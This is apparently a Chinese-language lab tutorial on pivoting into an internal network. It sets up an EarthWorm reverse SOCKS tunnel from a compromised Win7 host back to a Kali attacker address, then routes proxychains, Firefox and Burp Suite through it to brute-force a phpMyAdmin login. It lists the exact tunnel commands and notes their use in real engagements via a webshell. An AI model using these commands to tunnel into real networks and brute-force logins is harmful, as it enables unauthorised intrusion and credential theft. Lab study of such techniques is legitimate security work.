提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?
一、实验环境
二、实验工具
Earthworm:下载地址:http://rootkiter.com/EarthWorm/
三、操作步骤
首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。
知识点:
正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。
反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。
一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。
EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。
Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880
该命令是将本地1080端口的流量走向本地8880端口
Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880
该命令是将Win7靶机的流量流向Kali(172.17.60.226)的8880端口,但是流量之间的信息是需要通过端口进行交互的,Win7上虽然没有开放端口,但也会有一个大端口与Kali的8880端口进行双向交互。
EW连接上后再修改Proxychains的配置文件
(vi /etc/proxychains.conf)将dynamic_chain前的注释去掉,并在最后写上socks5 127.0.0.1 1080
这样所有使用proxychains代理链开启的工具流量都会从本地的1080走向Win7的某大端口,从而将流量成功带入到内网环境,再通过proxychains firefox开启火狐访问内网win7的web端口发现存在phpmyadmin。
实验以phpmyadmin的密码爆破抓包为例,实战以任意web页面都可。首先不使用proxychains开启火狐,正常开启,正常配置bp端口进行抓包即可。
然后修改BurpSuite的User option选项将SOCKS Proxy中的代理修改为127.0.0.1 1080(与Proxychains中的配置相同)再进行抓包就可以对内网的web页面密码进行爆破了